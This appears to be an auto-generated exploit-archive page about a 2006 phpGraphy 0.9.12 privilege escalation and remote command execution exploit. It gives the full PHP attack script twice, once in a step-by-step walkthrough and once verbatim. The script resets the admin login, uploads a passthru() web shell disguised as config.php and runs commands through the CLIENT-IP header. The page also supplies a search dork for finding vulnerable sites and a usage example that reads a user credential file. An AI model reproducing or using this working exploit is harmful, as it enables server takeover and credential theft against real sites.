By exploitdb papers bot•November 30, 2006•
papers
phpGraphy 0.9.12 Privilege Escalation and Remote Command Execution Exploit
phpGraphy 0.9.12 Privilege Escalation and Remote Command Execution Exploit
What this paper is
This paper describes a vulnerability in phpGraphy version 0.9.12 that allows an attacker to escalate privileges and execute arbitrary commands on the web server. The exploit leverages a flaw in how the application handles user input, particularly when register_globals is enabled in the PHP configuration.
Simple technical breakdown
The exploit works in several stages:
- Bypassing Authentication/Activating Install Mode: The script first attempts to trick phpGraphy into thinking it's in an installation mode. This allows it to set a default administrator username and password ("suntzu"/"suntzu") without needing to know the current credentials.
- Logging in as Administrator: Once install mode is activated, the script logs in using the newly set "suntzu" credentials. This grants it administrative privileges within the phpGraphy application.
- Uploading a Malicious File: With administrative access, the script uploads a specially crafted PHP file named
config.phpinto the web server's document root. This file contains a backdoor. - Executing Commands: The script then sends a request to the uploaded
config.phpfile. It cleverly uses theCLIENT-IPHTTP header to pass the desired command to the backdoor. The backdoor executes the command and returns the output, which the exploit script captures and displays.
The core vulnerability lies in the application's trust of user-supplied data and its insecure handling of session/configuration settings, particularly when register_globals is enabled.
Complete code and payload walkthrough
The provided PHP script is a command-line tool designed to exploit phpGraphy. Let's break down its components:
<?php
print_r('
---------------------------------------------------------------------------
PHPGraphy 0.9.12 Zend_Hash_Del_Key_Or_Index/privilege escalation/
/remote command execution exploit
by rgod
dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy site"
mail: retrog@alice.it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
works against register_globals=on
*/
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to PHPGraphy
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /phpgraphy/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost / cat ./data/users.dat -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//reset admin password...
//let's reactivate :) the *install mode* to do that
//you will be able to login with user -> suntzu, password -> suntzu
$data ="login=suntzu";
$data.="&password=suntzu";
$data.="&security_level=999"; //god
$data.="&uid=0";
$data.="&submit=Submit";
$packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: mode=um; install_mode=1; 2095608056=1; -285023552=1; action=edit;\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(2);
//login as admin...
$data ="user=suntzu";
$data.="&pass=suntzu";
$data.="&dir=";
$data.="&rememberme=on";
$data.="&startlogin=1";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\n";
sleep(1);
//upload the *evil* shell
//some tricks with "config" and "dir" to escape from the pictures/ dir, .htaccess protected
//you need a writable folder, if not succeeded try some of theese paths: ./themes, ./docs, ./base
//for "dir" argument, let's create a *fake* config.php in main folder
$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pictures[]"; filename="config.php";
<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="picupload"
1
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http:/".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: config=; -578819025=1; -747504677=1; dir=.; 2087386682=1; 2090185412=1; ".$cookie."\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
//launch commands...
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("my_delim",$html)){
$temp=explode("my_delim",$html);
echo $temp[1];
}
else {
echo "exploit failed...";
}
?>Code Fragment Explanations:
Header and Usage Information:
print_r('...');- Purpose: Displays introductory information about the exploit, its author, version targeted, and search engine dorks.
- Practical Purpose: Informs the user about the exploit's context.
Argument Handling and Configuration:
if ($argc<3) { ... die; }- Purpose: Checks if the minimum number of command-line arguments (script name, host, path) are provided. If not, it prints usage instructions and exits.
- Practical Purpose: Ensures the script has the necessary inputs to run.
error_reporting(0);- Purpose: Suppresses all PHP error reporting.
- Practical Purpose: Prevents noisy output from PHP errors that might interfere with exploit logic or output.
ini_set("max_execution_time",0);- Purpose: Sets the maximum execution time for PHP scripts to unlimited.
- Practical Purpose: Allows long-running commands or network operations without the script timing out.
ini_set("default_socket_timeout",5);- Purpose: Sets the default timeout for socket operations (like
fsockopen) to 5 seconds. - Practical Purpose: Prevents the script from hanging indefinitely if a connection fails.
- Purpose: Sets the default timeout for socket operations (like
Helper Functions:
function quick_dump($string)- Purpose: A utility function to format a string into a hexadecimal and ASCII representation.
- Practical Purpose: Useful for debugging or inspecting raw data, though not directly used in the exploit's core logic.
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';- Purpose: Defines a regular expression to validate proxy IP:port formats.
- Practical Purpose: Used to ensure the provided proxy address is correctly formatted.
Network Communication Function:
function sendpacketii($packet)- Purpose: This is the core function for sending HTTP requests to the target. It handles both direct connections and connections through a proxy.
- Inputs:
$packet(the raw HTTP request string). - Behavior:
- If
$proxyis empty, it usesfsockopento connect directly to$hoston$port. - If
$proxyis provided, it validates the proxy format, then connects to the proxy server usingfsockopen. - It sends the
$packetto the socket. - It reads the response from the socket into the global
$htmlvariable. For proxy connections, it reads until it finds a double CRLF (\r\n\r\n), indicating the end of headers. - It closes the socket.
- If
- Outputs: Populates the global
$htmlvariable with the server's response. - Practical Purpose: Abstracted network communication for sending crafted HTTP requests.
Argument Parsing and Initialization:
$host=$argv[1];$path=$argv[2];- Purpose: Assigns the target host and path from command-line arguments.
- Practical Purpose: Sets the target for the exploit.
$port=80; $proxy="";- Purpose: Initializes default port to 80 and proxy to empty.
- Practical Purpose: Sets default network parameters.
for ($i=3; $i<$argc; $i++){ ... }- Purpose: Iterates through remaining command-line arguments to parse port (
-p) and proxy (-P) options, and collects the command to be executed into$cmd. - Practical Purpose: Allows customization of the target port, proxy usage, and the command to run.
- Purpose: Iterates through remaining command-line arguments to parse port (
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) { ... die; }- Purpose: Validates that the provided path starts and ends with a forward slash, which is typical for web application paths.
- Practical Purpose: Basic input validation for the target path.
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}- Purpose: Constructs the base path for requests. If a proxy is used, it includes the host and port in the path for the proxy to forward.
- Practical Purpose: Prepares the target URL for constructing HTTP requests.
Stage 1: Reset Admin Password / Activate Install Mode:
$data ="login=suntzu"; ... $data.="&submit=Submit";- Purpose: Prepares the POST data for a request to
index.phpwithuid=0. This data attempts to set the username to "suntzu" and password to "suntzu", along withsecurity_level=999(likely an attempt to gain high privileges) andinstall_mode=1via cookies. - Practical Purpose: This is the initial step to bypass authentication by forcing the application into a state where default credentials can be used.
- Purpose: Prepares the POST data for a request to
$packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n"; ... $packet.=$data;- Purpose: Constructs the full HTTP POST request to trigger the install mode activation. It includes necessary headers like
Host,User-Agent,Referer,Content-Type,Content-Length, and crucially, theCookieheader withinstall_mode=1. - Practical Purpose: Sends the crafted request to the target to enable the "install mode".
- Purpose: Constructs the full HTTP POST request to trigger the install mode activation. It includes necessary headers like
sendpacketii($packet); sleep(2);- Purpose: Sends the packet and waits for 2 seconds to allow the server to process the request.
- Practical Purpose: Executes the request and provides a delay.
Stage 2: Login as Administrator:
$data ="user=suntzu"; ... $data.="&startlogin=1";- Purpose: Prepares POST data for logging in with the "suntzu" credentials.
- Practical Purpose: Attempts to authenticate using the credentials set in the previous step.
$packet ="POST ".$p."index.php HTTP/1.0\r\n"; ... $packet.=$data;- Purpose: Constructs the HTTP POST request to log in. It includes standard headers and the login data.
- Practical Purpose: Sends the login request.
sendpacketii($packet);- Purpose: Sends the login request.
$temp=explode("Set-Cookie: ",$html); ... $cookie.=" ".$temp2[0];- Purpose: Parses the server's response (
$html) to extract theSet-Cookieheader. This cookie is essential for maintaining the authenticated session. - Practical Purpose: Captures the session cookie needed for subsequent authenticated requests.
- Purpose: Parses the server's response (
echo "cookie -> ".$cookie."\n"; sleep(1);- Purpose: Prints the captured cookie and waits for 1 second.
- Practical Purpose: Debugging output and a small delay.
Stage 3: Upload Malicious Shell:
$data='-----------------------------7d61bcd1f033e ... <?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?> ... -----------------------------7d61bcd1f033e--';- Purpose: This is a multipart/form-data payload.
-----------------------------7d61bcd1f033e: Boundary markers for the multipart data.Content-Disposition: form-data; name="pictures[]"; filename="config.php";: This part tells the server that we are uploading a file namedconfig.phpand it's associated with thepictures[]form field.<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>: This is the actual PHP backdoor code.set_time_limit(0): Disables the script timeout.error_reporting(7): Sets error reporting to include E_ALL, E_ERROR, E_WARNING, E_PARSE.echo "my_delim";: Prints a delimiter string before the command output.passthru($_SERVER["HTTP_CLIENT_IP"]);: This is the core of the backdoor.passthruexecutes a command and outputs raw output. It takes the command from the$_SERVER["HTTP_CLIENT_IP"]superglobal. This is a crucial part of the exploit, as the attacker will inject commands here.echo "my_delim";: Prints a delimiter string after the command output.
Content-Disposition: form-data; name="picupload": Another form field, likely a submit button or flag.
- Practical Purpose: This payload creates a PHP file named
config.phpin a location accessible by the web server. This file acts as a remote command execution shell. TheCLIENT-IPheader will be used to pass commands to$_SERVER["HTTP_CLIENT_IP"].
- Purpose: This is a multipart/form-data payload.
$packet ="POST ".$p."index.php HTTP/1.0\r\n"; ... $packet.=$data;- Purpose: Constructs the HTTP POST request to upload the malicious
config.phpfile. It usesmultipart/form-dataas theContent-Typeand includes the boundary. TheCookieheader is crucial here, containing the session cookie obtained earlier, and importantly,dir=.which is used to control the upload directory. - Practical Purpose: Sends the file upload request to the target.
- Purpose: Constructs the HTTP POST request to upload the malicious
sendpacketii($packet); sleep(1);- Purpose: Sends the upload packet and waits for 1 second.
- Practical Purpose: Executes the file upload.
Stage 4: Launch Commands:
$packet ="GET ".$p."config.php HTTP/1.0\r\n";- Purpose: Constructs a GET request to the newly uploaded
config.phpfile. - Practical Purpose: This is how the attacker triggers the backdoor.
- Purpose: Constructs a GET request to the newly uploaded
$packet.="CLIENT-IP: ".$cmd."\r\n";- Purpose: This is the critical part for command execution. It injects the command provided by the user (
$cmd) into theCLIENT-IPHTTP header. The backdoor inconfig.phpreads this header and executes the command. - Practical Purpose: Delivers the arbitrary command to the server for execution.
- Purpose: This is the critical part for command execution. It injects the command provided by the user (
$packet.="Host: ".$host."\r\n"; ... $packet.="\r\n";- Purpose: Completes the HTTP GET request headers.
- Practical Purpose: Standard HTTP request formatting.
sendpacketii($packet);- Purpose: Sends the request to execute the command.
if (eregi("my_delim",$html)){ ... echo $temp[1]; } else { echo "exploit failed..."; }- Purpose: Checks the response (
$html) for the "my_delim" strings. If found, it splits the output by these delimiters and prints the content between them, which is the actual output of the executed command. If not found, it reports failure. - Practical Purpose: Retrieves and displays the output of the executed command.
- Purpose: Checks the response (
Payload/Shellcode Segments:
- Backdoor Payload:
<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>- Stage 1 (Initialization):
set_time_limit(0); error_reporting(7);- Sets up the PHP environment for execution. - Stage 2 (Delimiters):
echo "my_delim";- Prints a marker before the command output. - Stage 3 (Command Execution):
passthru($_SERVER["HTTP_CLIENT_IP"]);- This is the core. It takes the command from theCLIENT-IPHTTP header and executes it.passthruoutputs the raw result of the command. - Stage 4 (Delimiters):
echo "my_delim";- Prints a marker after the command output. - Overall Purpose: This PHP snippet acts as a simple web shell, allowing arbitrary commands to be executed via the
CLIENT-IPheader.
- Stage 1 (Initialization):
Mapping:
| Code Fragment/Block
Original Exploit-DB Content (Verbatim)
<?php
print_r('
---------------------------------------------------------------------------
PHPGraphy 0.9.12 Zend_Hash_Del_Key_Or_Index/privilege escalation/
/remote command execution exploit
by rgod
dork: intext:"This site is using phpGraphy" | intitle:"my phpgraphy site"
mail: retrog@alice.it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');
/*
works against register_globals=on
*/
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to PHPGraphy
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /phpgraphy/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost / cat ./data/users.dat -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
//reset admin password...
//let's reactivate :) the *install mode* to do that
//you will be able to login with user -> suntzu, password -> suntzu
$data ="login=suntzu";
$data.="&password=suntzu";
$data.="&security_level=999"; //god
$data.="&uid=0";
$data.="&submit=Submit";
$packet ="POST ".$p."index.php?uid=0 HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: mode=um; install_mode=1; 2095608056=1; -285023552=1; action=edit;\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(2);
//login as admin...
$data ="user=suntzu";
$data.="&pass=suntzu";
$data.="&dir=";
$data.="&rememberme=on";
$data.="&startlogin=1";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
echo "cookie -> ".$cookie."\n";
sleep(1);
//upload the *evil* shell
//some tricks with "config" and "dir" to escape from the pictures/ dir, .htaccess protected
//you need a writable folder, if not succeeded try some of theese paths: ./themes, ./docs, ./base
//for "dir" argument, let's create a *fake* config.php in main folder
$data='-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="pictures[]"; filename="config.php";
<?php set_time_limit(0);error_reporting(7);echo "my_delim"; passthru($_SERVER["HTTP_CLIENT_IP"]); echo "my_delim";?>
-----------------------------7d61bcd1f033e
Content-Disposition: form-data; name="picupload"
1
-----------------------------7d61bcd1f033e--
';
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http:/".$host.$path."index.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
$packet.="User-Agent: Lynx/2.8.3dev.8 libwww-FM/2.14FM\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: config=; -578819025=1; -747504677=1; dir=.; 2087386682=1; 2090185412=1; ".$cookie."\r\n";
$packet.="Connection: keep-alive\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
//launch commands...
$packet ="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("my_delim",$html)){
$temp=explode("my_delim",$html);
echo $temp[1];
}
else {
echo "exploit failed...";
}
?>
# milw0rm.com [2006-11-30]